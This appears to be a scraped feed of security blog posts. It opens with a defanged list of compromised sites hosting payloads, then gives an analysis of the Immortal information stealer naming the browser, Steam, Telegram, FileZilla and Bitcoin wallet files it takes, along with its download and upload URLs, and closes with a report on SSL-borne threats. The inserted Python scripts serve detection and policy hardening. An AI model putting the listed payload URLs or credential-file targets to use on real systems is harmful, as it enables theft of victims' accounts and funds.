natristhub[.]club/.well-known/pki-validation/msges.jpg natristhub[.]club/.well-known/pki-validation/msg.jpg mytripland[.]com:80/.well-known/pki-validation/sserv.jpg learning[.]ipeary.com/.well-known/pki-validation/msg.jpg ipeari[.]com/.well-known/pki-validation/msg.jpg diennangmattroi[.]com/.well-known/pki-validation/msges.jpg diennangmattroi[.]com/.well-known/pki-validation/msg.jpg alonhadat24h[.]vn/.well-known/acme-challenge/update_2018_02.browser-components.zip 24bizhub[.]com/.well-known/pki-validation/msges.jpg 24bizhub[.]com/.well-known/pki-validation/msg.jpg thinkmonochrome[.]co.uk/.well-known/acme-challenge/messg.jpg test[.]digimarkting.com/.well-known/pki-validation/msg.jpg needcareers[.]com/.well-known/pki-validation/msg.jpg hanggiadungduc[.]vn/.well-known/acme-challenge/reso.zip designitpro[.]net/.well-known/acme-challenge/msg.jpg zanatika[.]com:80/.well-known/acme-challenge/ssj.jpg vina[.]fun:80/.well-known/acme-challenge/ssj.jpg nexusdental[.]com.mx/.well-known/acme-challenge/ssj.jpg neccotweethearts[.]com:80/.well-known/pki-validation/ssj.jpg jayc[-]productions.com:80/.well-known/acme-challenge/ssj.jpg indochine[-]mekong.com:80/.well-known/acme-challenge/ssj.jpg hexamersolution[.]com/.well-known/acme-challenge/msg.jpg hexacode[.]lk:80/.well-known/acme-challenge/ssj.jpg dongha[.]city:80/.well-known/acme-challenge/ssj.jpg domika[.]vn/.well-known/acme-challenge/msg.jpg coupanadda[.]in:80/.well-known/pki-validation/ssj.jpg choviahe[.]cf:80/.well-known/acme-challenge/ssj.jpg brace[-]dd.com/.well-known/pki-validation/msg.jpg angkaprediksi[.]fun/.well-known/acme-challenge/msg.jpg advancitinc[.]com/.well-known/pki-validation/msg.jpg vodai[.]bid/.well-known/pki-validation/ssj.jpg thucphammena[.]com/.well-known/acme-challenge/ssj.jpg thefoodgram[.]com/.well-known/acme-challenge/tehnikol.zip thefoodgram[.]com/.well-known/acme-challenge/stroi-industr.zip shopkimhuyen[.]com/.well-known/acme-challenge/msg.jpg shine[.]bmt.city/.well-known/acme-challenge/ssj.jpg 
sbs[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip needcareers[.]com/.well-known/pki-validation/tehnikol.zip needcareers[.]com/.well-known/pki-validation/stroi-industr.zip maithanhduong[.]com/.well-known/pki-validation/pik.zip luongynhiem[.]com/.well-known/pki-validation/gkpik.zip lichxuansaigon[.]com:80/.well-known/acme-challenge/ssj.jpg kinder[-]express.de/.well-known/acme-challenge/reso.zip khannen[.]com.vn/.well-known/acme-challenge/ssj.jpg jayc[-]productions.com/.well-known/acme-challenge/ssj.jpg jambanswers[.]org/.well-known/pki-validation/ssj.jpg intercontinentalglobalservice[.]com:80/.well-known/pki-validation/ssj.jpg gurusexpo[.]com.ng/.well-known/pki-validation/ssj.jpg gotrungtuan[.]online/.well-known/acme-challenge/ssj.jpg goindelivery[.]com/.well-known/pki-validation/major.zip fernandoherrera[.]me:80/.well-known/acme-challenge/ssj.jpg diennangmattroi[.]com/.well-known/pki-validation/stroi-industr.zip canhooceangate[.]com/.well-known/acme-challenge/sserv.jpg bramptonpharmacy[.]ca/.well-known/acme-challenge/msg.jpg bolt[-]fast.com/.well-known/pki-validation/gkpik.zip bmt[.]today/.well-known/acme-challenge/ssj.jpg blog[.]ponta-fukui.com/.well-known/pki-validation/pik.zip bhartivaish[.]com:80/.well-known/acme-challenge/ssj.jpg attireup[.]com/.well-known/acme-challenge/tehnikol.zip attireup[.]com/.well-known/acme-challenge/stroi-industr.zip acreationevents[.]com/.well-known/acme-challenge/msg.jpg yeu82[.]com/.well-known/acme-challenge/ssj.jpg yeu81[.]com/.well-known/acme-challenge/ssj.jpg yeu49[.]com/.well-known/acme-challenge/ssj.jpg yeu48[.]com/.well-known/acme-challenge/ssj.jpg vuacacao[.]com/.well-known/acme-challenge/ssj.jpg vision[-]ex.de/.well-known/acme-challenge/reso.zip vinaykhatri[.]in/.well-known/acme-challenge/ssj.jpg vinaykhatri[.]in/.well-known/acme-challenge/mxr.pdf variantmag[.]com/.well-known/acme-challenge/sserv.jpg valentinesblues[.]com/.well-known/pki-validation/sserv.jpg 
uyencometics[.]bmt.city/.well-known/acme-challenge/ssj.jpg tysonfury[.]rocks/.well-known/acme-challenge/msg.jpg tulipremodeling[.]com/.well-known/acme-challenge/sserv.jpg tropictowersfiji[.]com/.well-known/pki-validation/pik.zip thesaturnring[.]com/.well-known/acme-challenge/mxr.pdf theotokis[.]gr/.well-known/pki-validation/mxr.pdf thefashionelan[.]com/.well-known/pki-validation/msg.jpg tanione[.]com:80/.well-known/acme-challenge/ssj.jpg tanione[.]com/.well-known/acme-challenge/ssj.jpg steeveriano[.]com/.well-known/pki-validation/msg.jpg singleparentaustralia[.]com.au/.well-known/pki-validation/reso.zip shafercharacter[.]org/.well-known/acme-challenge/messg.jpg service[.]baynuri.net/.well-known/acme-challenge/messg.jpg samyaksolution[.]co.in/.well-known/pki-validation/rolf.zip realman[.]work/.well-known/acme-challenge/reso.zip rarejewelry[.]net/.well-known/acme-challenge/mxr.pdf rarejewelry[.]net/.well-known/acme-challenge/messg.jpg qsongchihotel[.]com/.well-known/acme-challenge/ssj.jpg panama[.]driverclub.co/.well-known/pki-validation/pic.zip ngheve[.]com/.well-known/acme-challenge/ssj.jpg nfc[.]com.vn/.well-known/acme-challenge/msg.jpg next[-]vision.ro/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/ssj.jpg newsnaija[.]ng/.well-known/pki-validation/mxr.pdf neelshivamlaw[.]com/.well-known/pki-validation/pic.inform.zip neccotweethearts[.]com/.well-known/pki-validation/ssj.jpg navegacaolacet[.]com.br/.well-known/acme-challenge/msg.jpg mytripland[.]com/.well-known/pki-validation/ssj.jpg myschoolmarket[.]com.ng/.well-known/acme-challenge/ssj.jpg mskhangroup[.]com/.well-known/pki-validation/pic.zip mskhangroup[.]com/.well-known/pki-validation/msg.jpg morganbits[.]com/.well-known/acme-challenge/mxr.pdf mo7o[.]fun:80/.well-known/acme-challenge/mxr.pdf mitsubishidn[.]com.vn/.well-known/acme-challenge/sserv.jpg meliscar[.]com:80/.well-known/pki-validation/ssj.jpg meliscar[.]com/.well-known/pki-validation/ssj.jpg 
manhattan[.]dangcaphoanggia.com/.well-known/acme-challenge/mxr.pdf maithanhduong[.]com/.well-known/pki-validation/msg.jpg lichxuansaigon[.]com/.well-known/acme-challenge/ssj.jpg lemon[-]remodeling.com/.well-known/acme-challenge/sserv.jpg lastra[.]top/.well-known/pki-validation/msg.jpg laflamme[-]heli.com/.well-known/acme-challenge/ssj.jpg laflamme[-]heli.com/.well-known/acme-challenge/sserv.jpg kousen[.]fire-navi.jp/.well-known/pki-validation/msg.jpg jambanswers[.]org/.well-known/pki-validation/vseros.bank.zakaz.docx.zip integramultimedia[.]com.mx/.well-known/acme-challenge/ssj.jpg incgoin[.]com/.well-known/pki-validation/reso.zip hexacode[.]lk/.well-known/acme-challenge/ssj.jpg happysungroup[.]de/.well-known/pki-validation/ssj.jpg goindelivery[.]com/.well-known/pki-validation/reso.zip goindelivery[.]com/.well-known/pki-validation/msg.jpg goindelivery[.]com/.well-known/pki-validation/kia.zip gnb[.]uz/.well-known/pki-validation/ssj.jpg geecee[.]co.za/.well-known/pki-validation/msg.jpg geecee[.]co.za/.well-known/pki-validation/kia.zip gdn[.]segera.live/.well-known/pki-validation/sserv.jpg fijidirectoryonline[.]com/.well-known/pki-validation/msg.jpg fastimmo[.]fr/.well-known/acme-challenge/sserv.jpg ereservices[.]com/.well-known/pki-validation/sserv.jpg ede[.]coffee/.well-known/acme-challenge/ssj.jpg dongydaisinhduong[.]com/.well-known/acme-challenge/messg.jpg diota[-]ar.com:80/.well-known/acme-challenge/mxr.pdf diota[-]ar.com/.well-known/acme-challenge/mxr.pdf diamondking[.]co/.well-known/pki-validation/sserv.jpg dev01[.]europeanexperts.com/.well-known/pki-validation/messg.jpg designitpro[.]net/.well-known/acme-challenge/reso.zip damuoigiasi[.]com/.well-known/acme-challenge/ssj.jpg dailynow[.]vn/.well-known/acme-challenge/msg.jpg choviahe[.]cf/.well-known/acme-challenge/ssj.jpg cellulosic[.]logicalatdemo.co.in/.well-known/pki-validation/ssj.jpg business[.]driverclub.co/.well-known/pki-validation/msg.jpg bhartivaish[.]com/.well-known/acme-challenge/sserv.jpg 
bcspremier[.]ru/promo/well-known/images/background_sm.jpg
bcspremier[.]ru/promo/well-known/images/background_lg.jpg
atiqah[.]my/.well-known/pki-validation/sserv.jpg
aanarehabcenter[.]com:80/.well-known/pki-validation/ssj.jpg
aanarehabcenter[.]com/.well-known/pki-validation/ssj.jpg
24bizhub[.]com/.well-known/pki-validation/tehnikol.zip
24bizhub[.]com/.well-known/pki-validation/stroi-industr.zip
ipeari[.]com/.well-known/pki-validation/msg.jpg
ipeari[.]com/.well-known/pki-validation/reso.zip
ipeari[.]com/.well-known/pki-validation/stroi-industr.zip
ipeari[.]com/.well-known/pki-validation/stroi-invest.zip
ipeari[.]com/.well-known/pki-validation/tehnikol.zip
learning[.]ipeary.com/.well-known/pki-validation/msg.jpg
learning[.]ipeary.com/.well-known/pki-validation/reso.zip
learning[.]ipeary.com/.well-known/pki-validation/stroi-industr.zip
learning[.]ipeary.com/.well-known/pki-validation/stroi-invest.zip
learning[.]ipeary.com/.well-known/pki-validation/tehnikol.zip
test[.]digimarkting.com/.well-known/pki-validation/msg.jpg
test[.]digimarkting.com/.well-known/pki-validation/reso.zip
test[.]digimarkting.com/.well-known/pki-validation/stroi-industr.zip

### Immortal information stealer
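Nearly every indicator in the list above sits under `.well-known/acme-challenge/` or `.well-known/pki-validation/`, directories that legitimately hold only short domain-validation tokens, yet the files served are images, PDFs and ZIP archives. The following is an added example (not code from the original post) of a proxy-log sweep that turns that observation into a detection rule. The rule itself, the `.txt` allowance for CA validation files, and the sample URLs are this example's own assumptions; the ACME token shape follows RFC 8555.

```python
"""Flag requests that abuse .well-known/acme-challenge and .well-known/pki-validation
to host payloads, as in the indicator list above.

Added example, not part of the original post. The rule is this example's own
assumption: ACME HTTP-01 tokens (RFC 8555) and CA domain-validation files are
short text tokens, so an image, archive, document or executable under those
directories has no legitimate reason to be there. Sample URLs are constructed.
"""
import re
from collections import Counter
from urllib.parse import urlsplit

VALIDATION_DIRS = ("acme-challenge", "pki-validation")
PAYLOAD_EXTENSIONS = (".zip", ".jpg", ".jpeg", ".png", ".gif", ".pdf",
                      ".exe", ".dll", ".scr", ".js", ".doc", ".docx")
# base64url token with no extension, the shape of an ACME HTTP-01 challenge token
ACME_TOKEN_RE = re.compile(r"^[A-Za-z0-9_-]{20,}$")

# Constructed sample, mirroring the path shapes seen in the list above
SAMPLE_URLS = [
    "shop.example[.]com/.well-known/acme-challenge/ssj.jpg",
    "blog.example[.]org:80/.well-known/pki-validation/reso.zip",
    "www.example[.]net/.well-known/acme-challenge/LoqXcYV8q5ONbJQxbmR7SCTNo3tiAXDfowyjxAjEuX0",
    "www.example[.]net/.well-known/pki-validation/AB12CD34.txt",
    "cdn.example[.]com/promo/well-known/images/background_lg.jpg",
]


def refang(url: str) -> str:
    """Undo the [.] and [-] defanging used in indicator lists."""
    return url.replace("[.]", ".").replace("[-]", "-")


def classify_path(url: str) -> str:
    """Return 'suspicious', 'likely-legit', 'review' or 'not-well-known'."""
    url = refang(url.strip())
    if "://" not in url:
        url = "http://" + url          # urlsplit needs a scheme to separate host and path
    segments = [s for s in urlsplit(url).path.split("/") if s]
    if len(segments) < 3 or segments[0] != ".well-known" or segments[1] not in VALIDATION_DIRS:
        return "not-well-known"
    filename = segments[-1]
    if filename.lower().endswith(PAYLOAD_EXTENSIONS):
        return "suspicious"           # binary/document content where only a token belongs
    if segments[1] == "acme-challenge" and ACME_TOKEN_RE.match(filename):
        return "likely-legit"
    if segments[1] == "pki-validation" and filename.lower().endswith(".txt"):
        return "likely-legit"
    return "review"


def scan(urls):
    """Classify each URL; this is what a sweep over proxy logs would report."""
    return [(url, classify_path(url)) for url in urls]


def summarize(urls) -> dict:
    """Count verdicts, e.g. to decide whether a host needs follow-up."""
    return dict(Counter(verdict for _, verdict in scan(urls)))


if __name__ == "__main__":
    for url, verdict in scan(SAMPLE_URLS):
        print(f"{verdict:15} {url}")
    print(summarize(SAMPLE_URLS))
```

The `bcspremier[.]ru/promo/well-known/...` entries above fall outside the real `.well-known` directory and so come back as `not-well-known`; they would need a separate rule.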

Recently, the Zscaler ThreatLabZ team came across a new information stealer called Immortal, which is written in .NET and designed to steal sensitive information from an infected machine. The Immortal stealer is sold on the dark web with different build-based subscriptions. This blog provides an analysis of the data Immortal steals from browsers, the files it steals (and the applications it steals them from), and what it does with the stolen data.

Immortal starts its infection by creating a directory with a random name in the temp folder. Next, it creates a password.log file at "\%Temp%\{Random_DirName}\password.log". Immortal writes the malware name, the author's name, and the author's Telegram address into password.log, followed by:

- Date: Current date and time, "MM/dd/yyyy HH:mm:ss"
- Windows Username: Username
- HWID: MachineGuid
- System: Operating system name

#### Browser info stealing

Immortal steals data from 24 browsers: stored credentials, cookies, credit card data, and autofill data. When the user saves a username and password in a targeted browser, the browser stores them in the "Login Data" file (an SQLite database) and stores cookies in the "Cookies" file. Autofill data, credit card data, and other web information go into the "Web Data" file. The paths of those files are:

- "\%AppData%\Local\{Browser}\User Data\Default\Login Data"
- "\%AppData%\Local\{Browser}\User Data\Default\Web Data"
- "\%AppData%\Local\{Browser}\User Data\Default\Cookies"

Targeted browsers: Chrome, Yandex, Orbitum, Opera, Amigo, CentBrowser, Torch, Comodo, Go!, ChromePlus, Uran, BlackHawk, CoolNovo, AcWebBrowser, Epic Browser, Baidu Spark, Rockmelt, Sleipnir, SRWare Iron, Titan Browser, Flock, Vivaldi, Sputnik, and Maxthon.

#### Credential stealing

The malware fetches credentials from the "Login Data" file and appends them to password.log ("\%Temp%\{Random_DirName}\password.log") in the format below:

- SiteUrl: Website URL
- Login: Username
- Password: Password
- Program: Targeted browser

#### Cookie stealing

Immortal fetches cookie data from the Cookies file and stores it in a {Browsername}_cookies.txt file at "\%Temp%\{Random_DirName}\Cookies\{Browsername_cookies.txt}". The format is shown below.

#### Credit card data

Immortal fetches credit card data from the "Web Data" file and stores it in a {Browsername}_CC.txt file at "\%AppData%\{Random_DirName}\CC\{Browsername_CC.txt}". The format is shown below.

#### Autofill data

The autofill feature of a browser lets the user store commonly entered web-form information, which may include username, email, password, address, and credit card details, so that the browser fills it in automatically when a page is opened. This information is stored in the "Web Data" file. Immortal fetches autofill data from the "Web Data" file and stores it in the {Autofill}_CC.txt file at "\%AppData%\{Random_DirName}\Autofill\{Browsername_Autofill.txt}". The format is shown below.

#### File stealing

Immortal steals files from many different applications. The details are below.

##### Minecraft launchers

The malware steals user data files and sessions from Minecraft launcher applications and copies them into "%Temp%\{Random_DirName}\Applications\{AppName}\". The launchers targeted are MinecraftOnly, McSkill, LavaCraft, MinecraftLauncher, VimeWorld, and RedServer.

##### Steam

The malware steals files belonging to the Steam application. Steam is an application for playing, discussing, and creating games. The files stolen by Immortal are:

- SSFN (2 files)
- VDF files from the config folder: Config.vdf and loginusers.vdf

##### Telegram and Discord

Immortal also steals session-related files from Telegram and Discord. Telegram is a cloud-based instant messaging and voice over IP service. Discord is a cross-platform voice and text chat application designed to help gamers talk to each other in real time. Immortal copies those files into "%Temp%\{Random_Name}\Applications\{AppName}\". File paths:

- %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\
- %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map0
- %AppData%\Telegram Desktop\tdata\D877F783D5D3EF8C1\map1
- %AppData%\discord\\Local Storage\\https_discordapp.com_0.localstorage

##### FileZilla

Immortal steals files that contain FileZilla credentials. FileZilla is a well-known FTP tool used for file transfer. The malware copies the files below into "\%Temp%\{Random_DirName}\FileZilla\".

- \%AppData%\Filezilla\recentservers.xml
- \%AppData%\Filezilla\sitemanager.xml

##### Bitcoin-Qt wallet

Immortal steals the wallet.dat file from Bitcoin-Qt, a free and open-source Bitcoin wallet. Below is a screenshot of the code that fetches the wallet path from the registry. The malware copies wallet.dat into "%Temp%\{Random_DirName}\".

##### Desktop files

Immortal also goes through every file in the desktop folder on the victim's system. It steals files with the extensions listed below and copies them into "%Temp%\{Random_DirName}\Files\": txt, log, doc, docx, sql.

##### Screenshot & Webcam

Immortal takes a screenshot of the desktop of the infected system and saves it in "\%AppData%\{Random_DirName}\desktop.jpg". It also captures a webcam snapshot and saves it in "\%AppData%\{Random_DirName}\CamPicture.jpg".

#### Network communication

The malware stores all the stolen data in the directory "\%Temp%\{Random_DirName}\". It then compresses all the files into a ZIP archive saved as \%Temp%\{Random_filename}.zip and sends {Random_filename}.zip to its command-and-control server as shown below, deleting "\%Temp%\{Random_DirName}\" before the ZIP file is sent. The upload identifies the victim with:

- User = User name
- Hwid = MachineGuid

At the time of analysis, the command-and-control panel for this stealer was live. We found the Immortal stealer being advertised and sold with different build-based subscriptions. The following is a screenshot of a page that describes all of Immortal's functionality and the cost per build. The price for one build is $30.

#### IOCs

- MD5: 1719ff4ff267ef598a1dcee1d5b68667
- Downloading URL: www.appleidservice[.]jp/stealer/files/svhost.exe
- Network URL: www.appleidservice[.]jp/stealer/files/upload.php
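The staging layout described above (a randomly named directory under the temp folder holding password.log beside Cookies, CC, Autofill, Applications and Files sub-folders, then a loose ZIP in the temp folder before upload) is a usable host-triage signature. The following is an added example, not Zscaler's or the malware author's code, that applies it to a file listing such as an EDR inventory or a file-system walk would produce. The `%Temp%` root, the two-marker threshold and the sample listing are this example's own assumptions; the marker names come from the analysis above.

```python
"""Triage a file listing for the Immortal staging layout described in the post.

Added example, not Zscaler's code. Input is a list of absolute Windows paths.
Output: directories directly under %Temp% that hold password.log next to at
least one other marker the post names, plus loose ZIP archives in %Temp%.
The root path, the threshold and the sample listing are constructed.
"""
from collections import defaultdict
from pathlib import PureWindowsPath

TEMP = PureWindowsPath(r"C:\Users\alice\AppData\Local\Temp")   # constructed %Temp% root
MARKER_FILE = "password.log"
# Sub-folders and files the post says Immortal writes beside password.log
MARKER_CHILDREN = {"cookies", "cc", "autofill", "applications", "files",
                   "filezilla", "desktop.jpg", "campicture.jpg", "wallet.dat"}
MIN_MARKERS = 2   # password.log alone is too generic; require one more marker (assumption)

# Constructed listing: one staging directory, one exfil bundle, benign noise
SAMPLE_LISTING = [
    r"C:\Users\alice\AppData\Local\Temp\kq8z2p\password.log",
    r"C:\Users\alice\AppData\Local\Temp\kq8z2p\Cookies\Chrome_cookies.txt",
    r"C:\Users\alice\AppData\Local\Temp\kq8z2p\CC\Chrome_CC.txt",
    r"C:\Users\alice\AppData\Local\Temp\kq8z2p\Applications\Steam\config.vdf",
    r"C:\Users\alice\AppData\Local\Temp\kq8z2p\desktop.jpg",
    r"C:\Users\alice\AppData\Local\Temp\v7h3xw.zip",
    r"C:\Users\alice\AppData\Local\Temp\installer_a1\setup.log",
    r"C:\Users\alice\AppData\Local\Temp\installer_a1\password.log",
    r"C:\Users\alice\Documents\notes.txt",
]


def staging_candidates(paths):
    """Return {staging_dir: sorted marker names} for directories matching the layout."""
    by_dir = defaultdict(set)
    for raw in paths:
        p = PureWindowsPath(raw)
        try:
            rel = p.relative_to(TEMP)
        except ValueError:
            continue                      # outside %Temp%
        if len(rel.parts) < 2:
            continue                      # a file directly in %Temp%; see loose_archives
        staging = TEMP / rel.parts[0]     # the random-name directory
        child = rel.parts[1].lower()      # its immediate child: file or sub-folder
        if child == MARKER_FILE or child in MARKER_CHILDREN:
            by_dir[staging].add(child)
    return {str(d): sorted(m) for d, m in by_dir.items()
            if MARKER_FILE in m and len(m) >= MIN_MARKERS}


def loose_archives(paths):
    """ZIP files sitting directly in %Temp%, the shape of the bundle before upload."""
    return [str(PureWindowsPath(raw)) for raw in paths
            if PureWindowsPath(raw).parent == TEMP
            and PureWindowsPath(raw).suffix.lower() == ".zip"]


if __name__ == "__main__":
    for d, markers in staging_candidates(SAMPLE_LISTING).items():
        print("staging dir:", d, markers)
    for z in loose_archives(SAMPLE_LISTING):
        print("loose archive:", z)
```

Because the post notes that the staging directory is deleted before the ZIP is sent, a live host may show only the archive or neither; the two checks are meant to be run together with the network indicators above, not in isolation.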
Categories: Security Posts

### Scammers Use Cheap and Squatted Domains to Create Fake Sites

### What's hiding in encrypted traffic? Millions of advanced threats.

Once seen as the ultimate protection for data being transmitted over the internet, encryption has become a vast playground for cybercriminals. Zscaler ThreatLabZ, the research organization at Zscaler, analyzed the encrypted traffic traversing the Zscaler cloud in the second half of 2018 and prepared a report of our findings. The Zscaler cloud processes more than 60 billion transactions a day and, at that volume, it provides valuable insight into traffic patterns and the types of threats organizations are facing globally.

We already knew that the use of encryption had been rising each year, and our research showed this trend continuing. By December 2018, the amount of encrypted traffic on the Zscaler cloud had increased by 10 percent to nearly 80 percent of all traffic. This growth rate is consistent with the Google Transparency Report and Mozilla’s findings for the Firefox browser.

Zscaler has always made its cloud statistics available to anyone who wants to see them. We have recently created a dashboard that shows the volume of encrypted traffic crossing our cloud as a percentage of total traffic. You can view that interactive dashboard here: Real-Time Zscaler Cloud Activity: Encrypted Traffic Dashboard.

As the use of SSL* grows, cybercriminals are increasingly using encryption to conceal and launch attacks. In the second half of 2018, the Zscaler cloud blocked 1.7 billion threats hidden in SSL traffic, which translates to an average of 283 million advanced threats blocked per month. The top blocked threat categories in our study period included phishing attempts—which increased more than 400 percent over 2017—as well as malicious content, botnets, and browser exploits. One of the reasons that SSL-based threats have increased so dramatically is that SSL/TLS certificates, which were once expensive and difficult to obtain, are now easy to get—at no charge.
The vast majority of the certificates involved in security blocks in the Zscaler cloud were issued by Let’s Encrypt, a free service. Furthermore, nearly 32 percent of newly registered domains that were blocked by our cloud were using SSL encryption to deliver the content. We recommend inspecting and/or restricting access to newly registered domains, including those using SSL, to scan for malicious content being delivered from an otherwise unknown location with no history or reputation.

While the percentage growth in SSL traffic is slowing as it approaches totality, the threat trends are increasing in both frequency and sophistication. Cybercriminals know that most organizations are unable to inspect SSL traffic at scale. So, with malicious websites that can be set up in no time with free SSL certificates, they’re launching attacks that have a good chance of going undetected. Organizations should be inspecting all encrypted traffic, even from CDNs and trusted sites, because many of the threats we continue to block come from legitimate sites that have been compromised. Organizations that don’t inspect all traffic are at risk of infiltration that can be difficult to remediate, lead to costly breaches, or damage their reputation.

Read the full ThreatLabZ analysis of SSL/TLS-based threats: SSL Report

*The encryption protocol is known by several terms—Secure Sockets Layer (SSL), Transport Layer Security (TLS), and HTTPS—and they are often used interchangeably. For the sake of simplicity, I am using “SSL” in this blog.

Deepen Desai is Zscaler VP of Security Research and Operations
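The two recommendations above (inspect all encrypted traffic, including CDNs and trusted sites, and inspect or restrict newly registered domains) are easiest to reason about as a gateway policy with the weak settings beside the corrected ones. The following is an added example, not Zscaler's policy engine or any product configuration: a small evaluator that shows how a "trusted issuer" or "CDN bypass" exemption lets a freshly registered domain with a free certificate through uninspected, while the hardened policy restricts it. The 30-day window, the `Connection` fields and the sample connections are this example's own assumptions.

```python
"""Weak versus hardened SSL-inspection policy for a web gateway.

Added example, not Zscaler's code. Models the post's two recommendations:
decrypt and inspect all TLS traffic (no issuer or CDN exemptions) and restrict
newly registered domains. The NRD window and the sample traffic are constructed.
"""
from dataclasses import dataclass
from datetime import date
from typing import Optional


@dataclass(frozen=True)
class Connection:
    host: str
    tls: bool
    issuer: Optional[str]        # certificate issuer organisation; None for plaintext
    registered: Optional[date]   # domain creation date from WHOIS; None if unknown
    category: str                # gateway URL category, e.g. "cdn", "business"


@dataclass(frozen=True)
class Policy:
    nrd_window_days: int = 30                    # assumption: "newly registered" = 30 days
    bypass_categories: frozenset = frozenset()   # categories excused from decryption
    trusted_issuers: frozenset = frozenset()     # issuers whose TLS is not decrypted
    restrict_nrd: bool = True


# Weak: common "performance" exemptions. A free certificate or a CDN label
# is enough to skip inspection, and domain age is ignored.
WEAK = Policy(bypass_categories=frozenset({"cdn", "finance"}),
              trusted_issuers=frozenset({"Let's Encrypt", "DigiCert Inc"}),
              restrict_nrd=False)

# Hardened: the post's advice. Everything is decrypted and inspected; domains
# with no history are restricted until they earn a reputation.
HARDENED = Policy()

TODAY = date(2019, 6, 1)   # constructed evaluation date

SAMPLE = [
    Connection("login-verify.example", True, "Let's Encrypt", date(2019, 5, 28), "uncategorized"),
    Connection("cdn.example.net", True, "DigiCert Inc", date(2008, 1, 1), "cdn"),
    Connection("www.example.com", False, None, date(2005, 3, 3), "business"),
    Connection("unknown.example", True, "Let's Encrypt", None, "uncategorized"),
]


def is_newly_registered(conn: Connection, policy: Policy, today: date) -> bool:
    """Unknown registration date counts as new: no history, no reputation."""
    if conn.registered is None:
        return True
    return (today - conn.registered).days <= policy.nrd_window_days


def evaluate(conn: Connection, policy: Policy, today: date) -> str:
    """Return 'restrict', 'allow-uninspected' or 'inspect'."""
    if policy.restrict_nrd and is_newly_registered(conn, policy, today):
        return "restrict"
    if conn.category in policy.bypass_categories:
        return "allow-uninspected"      # the CDN/trusted-site gap the post warns about
    if conn.tls and conn.issuer in policy.trusted_issuers:
        return "allow-uninspected"      # free certificate treated as a trust signal
    return "inspect"


def compare(conns, today: date):
    """Side-by-side verdicts: (host, weak policy, hardened policy)."""
    return [(c.host, evaluate(c, WEAK, today), evaluate(c, HARDENED, today)) for c in conns]


if __name__ == "__main__":
    for host, weak, hardened in compare(SAMPLE, TODAY):
        print(f"{host:22} weak={weak:18} hardened={hardened}")
```

The point of the side-by-side run is the first and second rows: under the weak policy the four-day-old domain with a free certificate and the long-established CDN host are both passed through without decryption, which is exactly the traffic the post says carried most of the blocked threats.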
Categories: Security Posts

### Murkios bot drops files and controls system remotely

Categories: Security Posts

### Demystifying the Crypter Used in Emotet, Qbot, and Dridex

Categories: Security Posts

### Qealler – a new JAR-based information stealer

